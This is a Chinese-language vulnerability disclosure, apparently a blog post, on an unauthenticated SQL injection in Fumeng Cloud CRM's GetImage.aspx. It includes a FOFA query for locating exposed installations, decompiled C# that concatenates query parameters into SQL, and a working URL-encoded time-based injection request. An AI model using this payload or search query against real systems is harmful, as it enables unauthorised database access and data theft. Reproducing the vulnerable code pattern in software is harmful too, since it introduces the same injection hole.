孚盟云CRM GetImage.aspx SQL注入漏洞


漏洞简介

上海孚盟软件有限公司是一家专业的外贸SaaS服务和行业解决方案提供商。其旗下产品孚盟云GetImage.aspx接口存在 SQL注入漏洞。攻击者可在无需认证的情况下,通过构造恶意请求参数注入恶意 SQL 语句,导致数据库信息泄露、数据篡改甚至系统权限提升,影响系统数据安全和完整性。

影响版本

fofa语法

app="孚盟软件-孚盟云"

漏洞分析

直接看 Common/GetImage.aspx 对应的dll文件 FumaCRM_BS.NewWeb.dll 里有关 GetImage 方法的实现如下

public class GetImage : Page
{
  private DbHelperSql dbHelper = new DbHelperSql(UserCookie.GetCookieValue("corpId"));
  protected HtmlForm form1;

  protected void Page_Load(object sender, EventArgs e)
  {
    try
    {
      string str1 = this.Request.QueryString["MouldID"];
      string str2 = this.Request.QueryString["pkField"];
      string str3 = this.Request.QueryString["Field"];
      string str4 = Base64.base64Decode(this.Request.QueryString[str2]);
      string str5 = this.Request.QueryString["SqlNo"];
      if (string.IsNullOrEmpty(str5))
        str5 = "1";
      string str6 = this.dbHelper.Query($"select TableName from syMouldTables where MouldID='{str1}' and SqlNo={str5} and IsUpdate=1").Tables[0].Rows[0][0].ToString();
      byte[] numArray = this.dbHelper.Query($"select {str3} from {str6} where {str2}={str4}").Tables[0].Rows[0][0] as byte[];
      MemoryStream memoryStream = new MemoryStream(numArray);
      this.Response.Clear();
      this.Response.ContentType = "image/gif";
      this.Response.OutputStream.Write(numArray, 0, numArray.Length);
      this.Response.End();

未经过滤或参数化绑定的参数 MouldID 被直接拼接进SQL语句中进行执行,造成SQL注入漏洞。

漏洞复现

GET /Common/GetImage.aspx?MouldID=%2d%31%27%57%41%49%54%46%4f%52%20%44%45%4c%41%59%27%30%3a%30%3a%35%27%2d%2d HTTP/1.1
Host: fumacrm.mrxn.net

成功延时 5 秒


手机扫码阅读

东胜物流软件 GetDataListCA SQL注入漏洞

东胜物流软件 WmsZXFeeGridSource.aspx SQL注入漏洞

评 论